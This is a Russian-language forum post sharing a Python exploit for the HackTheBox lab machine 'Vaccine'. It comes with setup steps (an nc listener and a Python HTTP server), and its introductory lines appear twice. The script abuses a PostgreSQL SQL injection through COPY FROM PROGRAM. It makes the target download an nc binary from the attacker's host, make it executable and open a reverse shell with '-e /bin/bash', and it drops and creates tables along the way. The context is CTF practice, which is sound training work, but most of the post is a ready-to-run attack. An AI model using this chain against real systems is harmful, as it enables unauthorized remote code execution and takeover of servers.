Всем привет. Прохожу сейчас Starting point на HackTheBox и столкнулся с проблемой на машине Vaccine,так как у них в walkthrough схема sql инъекции не работает. Нашел такой такой вот выход из ситуации.
Когда вы уже на стадии запускать sql инъекцию что бы добратся до shell.
1. Запустите nc -lvp 4444
2. Python3 -m SimpleHTTPServer 80
3. Запустите вот этот код
Надеюсь это вам поможет не застопориться на этой машине. Всем спасибо.
Когда вы уже на стадии запускать sql инъекцию что бы добратся до shell.
1. Запустите nc -lvp 4444
2. Python3 -m SimpleHTTPServer 80
3. Запустите вот этот код
Python:
import requests
import random
your_cookie="XXXXXXXXXXXXXXXXXXXXXXXXXX" #CHANGE ME !
your_IP="10.10.14.XXX" #CHANGE ME !
your_web_port="80" #CHANGE ME !
your_nc_port_listener="4444" #CHANGE ME !
your_nc_PATH="nc" #CHANGE ME ! --> The path to the nc executable inside your web server
'''
Autor: Florianges
This script exploit the SQL injection in the CTF vaccine on HTB
This script sends an nc executable to the server and runs it to generate a reverse shell
You must start a web server to host the executable nc --> exemple : sudo python -m SimpleHTTPServer 80
And you must run a nc listener --> exemple: nc -lvp 4444
Then you can execute this script with python3
Note: The nc executable hosted on your web server must be GNU nc (and therefore must not be nec from OpenBSD)
'''
nb_random = str(random.randint(1,100000))
i=0
cmd = ['DROP TABLE IF EXISTS cmd_'+nb_random,
'CREATE TABLE cmd_'+ nb_random +'(cmd_output text)',
'COPY cmd_'+ nb_random +' FROM PROGRAM \'wget -P /tmp/'+ nb_random +' http://'+ your_IP +':'+ your_web_port +'/'+ your_nc_PATH + '\'',
'COPY cmd_'+ nb_random +' FROM PROGRAM \'chmod 777 /tmp/'+ nb_random +'/nc\'',
'COPY cmd_'+ nb_random +' FROM PROGRAM \'/tmp/' + nb_random +'/nc '+ your_IP +' ' + your_nc_port_listener +' -e /bin/bash\'']
while (i<=len(cmd)-1):
url = "http://10.10.10.46/dashboard.php?search=a';"+ cmd[i] +"; -- -"
cookies = {'PHPSESSID': your_cookie}
print("Payload --> " + url)
if(i==4):
print("All the payload is send, check your nc processus")
print("You can spawn tty with this command: SHELL=/bin/bash script -q /dev/null")
page = requests.get(url,cookies=cookies)
i=i+1
Надеюсь это вам поможет не застопориться на этой машине. Всем спасибо.